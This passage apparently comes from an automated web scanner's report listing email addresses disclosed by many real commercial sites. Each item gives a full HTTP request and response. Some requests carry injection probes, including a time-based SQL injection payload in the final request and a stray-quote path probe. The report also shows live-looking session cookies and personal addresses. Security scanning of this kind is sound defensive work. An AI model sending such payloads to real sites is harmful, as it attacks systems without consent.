Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:34:52 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 19282

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
<a href="mailto:tropical@theholidaygroup.com?subject=Enquiry - Beaches Boscobel Resort & Golf Club&body=Please provide some details such as: contact information - name, e-mail address and telephone number, duration, departure dates, group size a
...[SNIP]...
27.43. http://www.caribbean-ocean.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /index.php HTTP/1.1
Pragma: no-cache
Host: www.caribbean-ocean.com
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:13 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Set-Cookie: PHPSESSID=qbm7qqtgmut5v5nuuf82f6kcafdj7gll; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 29224

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
<area shape="rect" coords="570,65 794,50" href="mailto:caribbean@theholidaygroup.com" alt="caribbean@theholidaygroup.com">
...[SNIP]...
27.44. http://www.caribbean-ocean.com/index.php/1'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /index.php/1'

Issue detail

The following email address was disclosed in the response:

Request

GET /index.php/1' HTTP/1.1
Cookie: PHPSESSID=56e9tj63arfnmfkpi7rsto854a5vfekl
Host: www.caribbean-ocean.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:22 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 29224

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
<area shape="rect" coords="570,65 794,50" href="mailto:caribbean@theholidaygroup.com" alt="caribbean@theholidaygroup.com">
...[SNIP]...
27.45. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jCarousel/jCarousel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/javascript/jquery/plugins/jCarousel/jCarousel.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/javascript/jquery/plugins/jCarousel/jCarousel.js?1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:14:59 GMT
Server: Apache
Last-Modified: Fri, 13 Nov 2009 06:53:13 GMT
ETag: "20002e-3825-4783b1d128840"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 14373

/**
* jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget.
* @requires jQuery v1.2 or above
*
* http://gmarwaha.com/jquery/jcarousellite/
*
* Copyright
...[SNIP]...
llbacks. The functions will be passed an argument that represents an array of elements that
* are visible at the time of callback.
*
*
* @cat Plugins/Image Gallery
* @author Ganeshji Marwaha/ganeshread@gmail.com
*/

(function($) { // Compliant with jquery.noConflict()
$.fn.jCarouselLite = function(o) {
o = $.extend({
btnPrev: null,
btnNext:
...[SNIP]...
27.46. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jqzoom/jqzoom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/javascript/jquery/plugins/jqzoom/jqzoom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/javascript/jquery/plugins/jqzoom/jqzoom.js?1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:15:06 GMT
Server: Apache
Last-Modified: Fri, 13 Nov 2009 06:53:13 GMT
ETag: "200033-6c30-4783b1d128840"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 27696

/*
* JQZoom Evolution 1.0.1 - Javascript Image magnifier
*
* Copyright (c) Engineer Renzi Marco(www.mind-projects.it)
*
* $Date: 12-12-2008
*
*    ChangeLog:
*
* $License : GPL,so any change to the code you should copy and paste this section,and would be nice to report this to me(renzi.mrc@gmail.com).
*/
(function($)
{
$.fn.jqzoom = function(options)
{
var settings = {
zoomType: 'standard', //standard/reverse/innerzoom
zoomWidth: 200,        //zoomed wid
...[SNIP]...
27.47. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/checkout.php HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 72177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<script type="text/javascript">
                   lang.LoginEnterValidEmail = "Please type in a valid email address, such as joe@aol.com";
                   lang.LoginEnterPassword = "Please type in your password.";
                   lang.AccountEnterPassword = "Please type in a password.";
                   lang.AccountPasswordsDontMatch = "Your passwords don't match.";
       
...[SNIP]...
27.48. https://www.clone-systems.com/ecommerce/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/login.php

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/login.php?action=reset_password HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: https://www.clone-systems.com/ecommerce/checkout.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 19573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
n */
   function check_forgot_password_form() {
       var email = g("email");
       if(email.value.indexOf("@") == -1 || email.value.indexOf(".") == -1) {
           alert("Please type in a valid email address, such as joe@aol.com");
           email.focus();
           email.select();
           return false;
       }

       return true;
   }
//]]>
...[SNIP]...
27.49. http://www.cloneguard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloneguard.com
Path:   /favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.cloneguard.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQBRTTDR=PDCHINECNDEAGHCAAPDFDENM; __utmz=150400484.1304749011.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150400484.780713437.1304749011.1304749011.1304749011.1; __utmc=150400484; __utmb=150400484.1.10.1304749011

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 04 Mar 2011 23:33:53 GMT
Accept-Ranges: bytes
ETag: "80c6399fc4dacb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:24:12 GMT
Content-Length: 1142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us">
<head>
<title>
...[SNIP]...
<a href="mailto:info@CloneGuard.com?subject=404%20Error"><font size="2">Info@CloneGuard.com</font>
...[SNIP]...
27.50. http://www.compliancepoint.com/sub_serv_isc_pci.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compliancepoint.com
Path:   /sub_serv_isc_pci.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sub_serv_isc_pci.asp?gclid=CJu4wszV1KgCFQ075QodRCyFgQ HTTP/1.1
Host: www.compliancepoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:16:34 GMT
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e72934c3e090fe010326c542496bd26f; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.compliancepoint.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 17114
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADDBQTC=NKAKGEBDADCKPECBKIOIPJEM; path=/
Cache-control: private

<html>
<head>
<title>CompliancePoint</title>

<link href="menu.css" type=text/css rel=stylesheet />
<link href="style.css" type=text/css rel=stylesheet />
<script src="main.js"></script>
<scrip
...[SNIP]...
<A href="mailto:security@compliancepoint.com">security@compliancepoint.com</A>
...[SNIP]...
<a href="mailto:info@possiblenow.com">
...[SNIP]...
<area shape="rect" coords="3,50,180,65" href="mailto:consulting@compliancepoint.com" alt="consulting@compliancepoint.com" />
<area shape="rect" coords="4,64,176,81" href="mailto:Security@compliancepoint.com" alt="security@compliancepoint.com" />
...[SNIP]...
27.51. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /site/scripts/jscalendar-1.0/calendar.js

Issue detail

The following email address was disclosed in the response:

Request

GET /site/scripts/jscalendar-1.0/calendar.js HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:33:44 GMT
Last-Modified: Fri, 22 Jun 2007 00:07:10 GMT
ETag: "1bc1e5-c055-71c78780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Connection: close

/* Copyright Mihai Bazon, 2002-2005 | www.bazon.net/mishoo
* -----------------------------------------------------------
*
* The DHTML Calendar, version 1.0 "It is happening again"
*
* Details
...[SNIP]...
<mihai_bazon@yahoo.com>
...[SNIP]...
27.52. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /site/scripts/jscalendar-1.0/lang/calendar-en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /site/scripts/jscalendar-1.0/lang/calendar-en.js HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:33:44 GMT
Last-Modified: Fri, 22 Jun 2007 00:07:49 GMT
ETag: "1bc203-e10-741a9f40"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 3600

// ** I18N

// Calendar EN language
// Author: Mihai Bazon, <mihai_bazon@yahoo.com>
// Encoding: any
// Distributed under the same terms as the calendar itself.

// For translators: please use UTF-8 i
...[SNIP]...
27.53. http://www.dominionenterprises.com/site/scripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /site/scripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /site/scripts/s_code.js HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:33:48 GMT
Last-Modified: Wed, 17 Nov 2010 17:28:27 GMT
ETag: "1bca81-87d4-4964c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Connection: close

/*
SiteCatalyst: H.22.1.
kevin.rogers@dominionenterprises.com
10.08.2010
*/

var s_account="dedominion"
var s=s_gi(s_account)
s.charSet="ISO-8859-1"
s.currencyCode="USD"
s.trackDownloadLinks=true
s.trackExternalLinks=true
s.trackInlineStats=true
s.lin
...[SNIP]...
27.54. http://www.dynamicperimeter.com/scripts/jquery.swapimage.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicperimeter.com
Path:   /scripts/jquery.swapimage.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery.swapimage.min.js HTTP/1.1
Host: www.dynamicperimeter.com
Proxy-Connection: keep-alive
Referer: http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pdpr=googletokenization

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 30 Aug 2010 10:44:52 GMT
ETag: "53c034-8be-277f3100"
Accept-Ranges: bytes
Content-Length: 2238
Content-Type: application/x-javascript

/**
* swapImage - jQuery plugin for swapping image
*
* Copyright (c) 2010 tszming (tszming@gmail.com)
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
*/
(function(a){a.swapImage=function(c,b,e,f,d){a
...[SNIP]...
27.55. http://www.eneighborhoods.com/common/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /common/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common/s_code.js HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 25641
Content-Type: application/x-javascript
Last-Modified: Wed, 07 May 2008 15:23:21 GMT
Accept-Ranges: bytes
ETag: "440a74856b0c81:660"
Date: Fri, 06 May 2011 18:40:25 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="deeneighborhoods"
var s=s_gi(s_account)
/**************
...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...
27.56. http://www.expedia.com/pubspec/scripts/include/overrideHelper.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pubspec/scripts/include/overrideHelper.js

Issue detail

The following email address was disclosed in the response:

Request

GET /pubspec/scripts/include/overrideHelper.js HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=info
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Cteonnt-Length: 4939
Content-Type: application/x-javascript
Last-Modified: Wed, 19 May 2010 19:27:03 GMT
Accept-Ranges: bytes
ETag: "805d654289f7ca1:0"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Cache-Control: private, max-age=51062
Date: Fri, 06 May 2011 22:35:52 GMT
Connection: close
Content-Length: 4939

//This is copied over from prototype since we don't want to fully include it here
var Class = {
   create: function() {
       return function() {
        this.initialize.apply(this, arguments);
       }
   }
}
...[SNIP]...
<a href="mailto:mkirsch@expedia.com">
...[SNIP]...
<a href="mailto:mkirsch@expedia.com">
...[SNIP]...
<a href="mailto:mkirsch@expedia.com">
...[SNIP]...
27.57. https://www.expedia.com/pubspec/scripts/include/overrideHelper.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pubspec/scripts/include/overrideHelper.js

Issue detail

The following email address was disclosed in the response:

Request

GET /pubspec/scripts/include/overrideHelper.js HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`0`user=v.8,0,EX019BC74F84p$B7202000$84$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$94$FF$C5o$B2$E2$9D$21$D6$EF$B2u!e02000`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`383; p1=`gacct=v.1,1,215819496`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`99

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 19 May 2010 19:27:03 GMT
Accept-Ranges: bytes
ETag: "805d654289f7ca1:0"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:44:26 GMT
Connection: keep-alive
Content-Length: 4939

//This is copied over from prototype since we don't want to fully include it here
var Class = {
   create: function() {
       return function() {
        this.initialize.apply(this, arguments);
       }
   }
}
...[SNIP]...
<a href="mailto:mkirsch@expedia.com">
...[SNIP]...
<a href="mailto:mkirsch@expedia.com">
...[SNIP]...
<a href="mailto:mkirsch@expedia.com">
...[SNIP]...
27.58. http://www.firstmateonline.com/businessinfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstmateonline.com
Path:   /businessinfo.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /businessinfo.php?location=17044%20or%20%28sleep%284%29%2b1%29%20limit%201%20--%20&sponsor=8159 HTTP/1.1
Cookie: fancyform=d9c8713861eb02680a2466c6a2547880; PHPSESSID=1efaeee0b0a2648e13c04a21839ee72b; zZ=a0
Host: www.firstmateonline.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
